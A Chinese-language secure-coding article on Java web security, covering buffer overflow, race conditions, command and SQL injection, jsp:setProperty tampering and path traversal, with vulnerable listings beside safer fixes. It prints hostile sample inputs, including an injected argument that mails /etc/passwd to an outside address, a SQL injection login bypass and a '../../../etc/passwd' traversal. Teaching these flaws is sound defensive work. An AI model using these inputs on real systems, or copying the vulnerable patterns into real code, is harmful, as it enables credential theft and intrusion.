概述和溢出
一、概述
编写安全的internet应用并不是一件轻而易举的事情:只要看看各个专业公告板就可以找到连续不断的安全漏洞报告。你如何保证自己的internet应用不象其他人的应用那样满是漏洞?你如何保证自己的名字不会出现在令人难堪的重大安全事故报道中?
如果你使用java servlet、javaserver pages(jsp)或者ejb,许多难以解决的问题都已经事先解决。当然,漏洞仍有可能出现。下面我们就来看看这些漏洞是什么,以及为什么java程序员不必担心部分c和perl程序员必须面对的问题。
c程序员对安全漏洞应该已经很熟悉,但象openbsd之类的工程提供了处理此类问题的安全系统。java语言处理这类问题的经验要比c少20年,但另一方面,java作为一种客户端编程语言诞生,客户端对安全的要求比服务器端苛刻得多。它意味着java的发展有着一个稳固的安全性基础。
java原先的定位目标是浏览器。然而,浏览器本身所带的java虚拟机虽然很不错,但却并不完美。sun的《chronology of security-related bugs and issues》总结了运行时环境的漏洞发现历史。我们知道,当java用作服务器端编程语言时,这些漏洞不可能被用作攻击手段。但即使java作为客户端编程语言,重大安全问题的数量也从1996年的6个(其中3个是相当严重的问题)降低到2000年的1个。不过,这种安全性的相对提高并不意味着java作为服务器端编程语言已经绝对安全,它只意味着攻击者能够使用的攻击手段越来越受到限制。那么,究竟有哪些地方容易受到攻击,其他编程语言又是如何面对类似问题的呢?
二、缓存溢出
在c程序中,缓存溢出是最常见的安全隐患。缓存溢出在用户输入超过已分配内存空间(专供用户输入使用)时出现。缓存溢出可能成为导致应用被覆盖的关键因素。c程序很容易出现缓存溢出,但java程序几乎不可能出现缓存溢出。
从输入流读取输入数据的c代码通常如下所示:
char buffer[1000];
int len = read(buffer);
由于缓存的大小在读入数据之前确定,系统要检查为输入保留的缓存是否足够是很困难的。缓存溢出使得用户能够覆盖程序数据结构的关键部分,从而带来了安全上的隐患。有经验的攻击者能够利用这一点直接把代码和数据插入到正在运行的程序。
在java中,我们一般用字符串而不是字符数组保存用户输入。与前面c代码等价的java代码如下所示:
string buffer = in.readline();
在这里,“缓存”的大小总是和输入内容的大小完全一致。由于java字符串在创建之后不能改变,缓存溢出也就不可能出现。退一步说,即使用字符数组替代字符串作为缓存,java也不象c那样容易产生可被攻击者利用的安全漏洞。例如,下面的java代码将产生溢出:
char[] bad = new char[6];
bad[7] = 50;这段代码总是抛出一个java.lang.arrayoutofboundsexception异常,而该异常可以由程序自行捕获:
try {
char[] bad = new char[6];
bad[7] = 50;
}
catch (arrayoutofboundsexception ex) {
… }
这种处理过程永远不会导致不可预料的行为。无论用什么方法溢出一个数组,我们总是得到arrayoutofboundsexception异常,而java运行时底层环境却能够保护自身免受任何侵害。一般而言,用java字符串类型处理字符串时,我们无需担心字符串的arrayoutofboundsexceptions异常,因此它是一种较为理想的选择。
java编程模式从根本上改变了用户输入的处理方法,避免了输入缓存溢出,从而使得java程序员摆脱了最危险的编程漏洞。
竞争和执行过程
三、竞争状态
竞争状态即race condition,它是第二类最常见的应用安全漏洞。在创建(更改)资源到修改资源以禁止对资源访问的临界时刻,如果某个进程被允许访问资源,此时就会出现竞争状态。这里的关键问题在于:如果一个任务由两个必不可少的步骤构成,不管你多么想要让这两个步骤一个紧接着另一个执行,操作系统并不保证这一点。例如,在数据库中,事务机制使得两个独立的事件“原子化”。换言之,一个进程创建文件,然后把这个文件的权限改成禁止常规访问;与此同时,另外一个没有特权的进程可以处理该文件,欺骗有特权的进程错误地修改文件,或者在权限设置完毕之后仍继续对原文件进行访问。
一般地,在标准unix和nt环境下,一些高优先级的进程能够把自己插入到任务的多个步骤之间,但这样的进程在java服务器上是不存在的;同时,用纯java编写的程序也不可能修改文件的许可权限。因此,大多数由文件访问导致的竞争状态在java中不会出现,但这并不意味着java完全地摆脱了这个问题,只不过是问题转到了虚拟机上。
我们来看看其他各种开发平台如何处理这个问题。在unix中,我们必须确保默认文件创建模式是安全的,比如在服务器启动之前执行“umask 200”这个命令。有关umask的更多信息,请在unix系统的命令行上执行“man umask”查看umask的man文档。
在nt环境中,我们必须操作acl(访问控制表,access control list)的安全标记,保护要在它下面创建文件的目录。nt的新文件一般从它的父目录继承访问许可。请参见nt文档了解更多信息。
java中的竞争状态大多数时候出现在临界代码区。例如,在用户登录过程中,系统要生成一个唯一的数字作为用户会话的标识符。为此,系统先产生一个随机数字,然后在散列表之类的数据结构中检查这个数字是否已经被其他用户使用。如果这个数字没有被其他用户使用,则把它放入散列表以防止其他用户使用。代码如listing 1所示:
(listing 1)
// 保存已登录用户的id
hashtable hash;
// 随机数字生成器
random rand;
// 生成一个随机数字
integer id = new integer(rand.nextint());
while (hash.containskey(id))
{
id = new integer(rand.nextint());
}
// 为当前用户保留该id
hash.put(id, data);
listing 1的代码可能带来一个严重的问题:如果有两个线程执行listing 1的代码,其中一个线程在hash.put(…)这行代码之前被重新调度,此时同一个随机id就有可能被使用两次。在java中,我们有两种方法解决这个问题。首先,listing 1的代码可以改写成listing 2的形式,确保只有一个线程能够执行关键代码段,防止线程重新调度,避免竞争状态的出现。第二,如果前面的代码是ejb服务器的一部分,我们最好有一个利用ejb服务器线程控制机制的唯一id服务。
(listing 2)
synchronized(hash)
{
// 生成一个唯一的随机数字
integer id =
new integer(rand.nextint());
while (hash.containskey(id))
{
id = new integer(rand.nextint());
}
// 为当前用户保留该id
hash.put(id, data);
}
四、字符串解释执行
在有些编程语言中,输入字符串中可以插入特殊的函数,欺骗服务器使其执行额外的、多余的动作。下面的perl代码就是一个例子:
$data = “mail body”;
system(“/usr/sbin/sendmail -t $1 < $data”);
显然,这些代码可以作为cgi程序的一部分,或者也可以从命令行调用。通常,它可以按照如下方式调用:
perl script.pl honest@true.com
它将把一个邮件(即“mail body”)发送给用户honest@true.com。这个例子虽然简单,但我们却可以按照如下方式进行攻击:
perl script.pl honest@true.com;mail
cheat@liarandthief.com < /etc/passwd
这个命令把一个空白邮件发送给honest@true.com,同时又把系统密码文件发送给了cheat@liarandthief.com。如果这些代码是cgi程序的一部分,它会给服务器的安全带来重大的威胁。
perl程序员常常用外部程序(比如sendmail)扩充perl的功能,以避免用脚本来实现外部程序的功能。然而,java有着相当完善的api。比如对于邮件发送,javamail api就是一个很好的api。但是,如果你比较懒惰,想用外部的邮件发送程序发送邮件:
runtime.getruntime().exec(“/usr/sbin/sendmail -t $retaddr < $data”);
事实上这是行不通的。java一般不允许把os级“<”和“;”之类的构造符号作为runtime.exec()的一部分。你可能会尝试用下面的方法解决这个问题:
runtime.getruntime().exec(“sh /usr/sbin/sendmail -t $retaddr < $data”);
但是,这种代码是不安全的,它把前面perl代码面临的危险带入了java程序。按照常规的java方法解决问题有时看起来要比取巧的方法复杂一点,但它几乎总是具有更好的可移植性、可扩展性,而且更安全、错误更少。runtime.exec()只是该问题的一个简单例子,其他许多情形更复杂、更隐蔽。
让我们来考虑一下java的映像api(reflection api)。java映像api允许我们在运行时决定调用对象的哪一个方法。任何由用户输入命令作为映像查找条件的时机都可能成为系统的安全弱点。例如,下面的代码就有可能产生这类问题:
method m = bean.getclass().getmethod(action, new class[] {});
m.invoke(bean, new object[] {});
如果“action”的值允许用户改变,这里就应该特别注意了。注意,这种现象可能会在一些令人奇怪的地方出现——或许最令人奇怪的地方就是jsp。大多数jsp引擎用映像api实现下面的功能:
<jsp:setproperty name=”bean” property=”*” />
这个bean的set方法应该特别注意,因为所有这些方法都可以被远程用户调用。例如,对于listing 3的bean和listing 4的jsp页面:
(listing 3)
public class example
{
public void setname(string name) {
this.name = name; }
public string getname() { return name; }
public void setpassword(string pass) {
this. pass = pass; }
public string getpassword() { return
pass; }
private string name;
private string pass;
}
(listing 4)
<%@ page import=”example” %>
<jsp:usebean id=”example” scope=”page”
class=”example” />
<jsp:setproperty name=”example” property=”*” />
<html>
<head>
<title>bean示例</title>
</head>
<body>
<form>
<input type=”text” name=”name” size=”30″>
<input type=”submit” value=”submit”>
</form>
</html>
从表面上看,这些代码只允许用户访问example bean的名字。然而,了解该系统的用户可以访问“http://whereever.com/example.jsp?name=fred&password=hack”这种url。这个url既改变name属性,也改变password密码属性。当然,这应该不是页面编写者的意图,作者的意图是设计一个只允许用户访问名字属性的页面。因此,在使用
<jsp:setproperty property=”*” … />。>
时应该非常小心
字符串被解释执行的问题可能在允许嵌入脚本代码的任何环境中出现。例如,这类问题可能在xalan(也称为lotusxsl)中出现,当然这是指系统设置不严格、易受攻击的情况下。
xalan的脚本支持能够关闭(而且这是xalan的默认设置),在敏感的应用中关闭脚本支持是一种明智的选择。当你需要用dom处理xml文档时还必须考虑到另外一点:dom保证所有文本都经过正确的转义处理,防止非法的标记插入到脚本之内。lotusxsl缺乏这个功能,但这绝不是一个bug。支持脚本是lotusxsl的一个特色,而且它(明智地)默认处于关闭状态。xsl的w3c规范并没有规定支持脚本的能力。
现在我们来看看字符串解释执行如何影响sql和jdbc。假设我们要以用户名字和密码为条件搜索数据库中的用户,listing 5的servlet代码看起来不错,但事实上它却是危险的。
(listing 5)
string user = request.getattribute(“username”);
string pass = request.getattribute(“password”);
string query = “select id from users where
username=”+user+” and password=”+pass;
statement stmt = con.createstatement(query);
resultset rs = con.executequery(query);
if (rs.next())
{
// 登录成功
int id = rs.getint(1);
…
}
else
{
// 登录失败
…
}
执行过程 下
如果用户输入的查询条件中,用户名字等于“fred”,密码等于“something”,则系统执行的查询实际上是:
select id from users where
username=fred and password=
something
这个查询能够正确地对用户名字和密码进行检查。但是,如果用户输入的查询条件中,名字等于“fred and (a=b”,密码等于“blah) or a=a”,此时系统执行的查询变成了:
select id from users
where username=fred and (
a=b and password=blah) or a=a
可以看出,这个查询无法正确地对用户名字和密码进行检查。listing 6的代码要安全得多,它从根本上防止了用户修改sql命令逃避检查。
(listing 6)
string user = request.getattribute(“username”);
string pass = request.getattribute(“password”);
string query = “select id from users
where username=? and password=?”;
preparedstatement stmt = con.preparestatement(query);
stmt.setstring(1, user);
stmt.setstring(2, pass);
resultset rs = stmt.executequery();
…
所有对文件系统的访问都是字符串可能被解释执行的地方。用java访问文件系统时,我们应该注意文件的命名方式。listing 7是一个可能带来危险的例子。这个程序根据用户输入决定读取哪个文件,它的危险就在于攻击者能够输入“../../../etc/passwd”这样的文件名字并获得系统的密码文件。这可不是我们希望出现的事情。预防出现这种安全漏洞最简单的方法是:除非绝对需要,否则不要使用平面文件(flat file)。
(listing 7)
public class unsafeservlet
{
public void doget(httpservletrequest request,
httpservletresponse response)
{
string product = request.getattribute(“product”);
reader fin = new filereader(
”/usr/unsafe/products/”+ product);
bufferedreader in = new bufferedreader(fin);
string cost = in.readline();
// 其他处理过程
response.getwriter().println(cost);
}
}
大多数服务器系统,包括servlet、jsp和ejb,都支持不直接依赖文件系统访问的配置方法。使用定制的securitymanager或者使用一个简单的检查脚本(检查程序是否直接操作文件系统以及是否使用映像api),我们就可以实施“无文件系统直接访问”策略。尽管大多数应用服务器允许使用文件系统,但一个好的ejb不会使用它。
最后,请务必不要忘记保持数据充分分离、精确定义这一良好的编程习惯。假设我们有一个用来保存用户信息的数据库,现在需要增加一个字段标示用户是否具有超级用户权限。如果在原来的表中增加一个列实在过于复杂,采用下面这种方法就变得很有吸引力:在用户名字中加上一个特殊字符表示用户是否具有特殊权限,当用户登录时检查该特殊字符,以便防止非法用户宣称自己拥有特殊权限。但事实上,这种做法是非常有害的。所有的数据域,不管它是在数据库中还是作为局部变量,都应该精确定义且只保存一份信息。
五、基本原则总结
根据上述讨论,我们得到如下防止出现安全问题的基本原则:
对于各个输入域,严格地定义系统可接受的合法输入字符,拒绝所有其他输入内容。
应该尽可能早地对用户输入进行检查,使得使用危险数据的区域减到最小。
不要依赖浏览器端javascript进行安全检查(尽管对用户来说这是一种非常有用的功能),所有已经在客户端进行的检查应该在服务器端再进行一次。
这些原则有助于消除大量的安全问题。本质上,在应用这一级上,url和post数据是用户和应用交互的唯一途径,所以我们的注意力应该集中在url和用户输入数据的安全性上。
当然,简单地遵从本文的建议并不能够保证绝对的安全。你必须分析其他各方面的因素,包括网络的安全性以及你所用到的其他服务的安全性。
每天都有新的安全漏洞被发现和修正。在系统足够安全、可以连接到internet之前,请务必听取专家的建议;在正式提交源代码之前,一定要留意可能存在的漏洞。小心永不过份。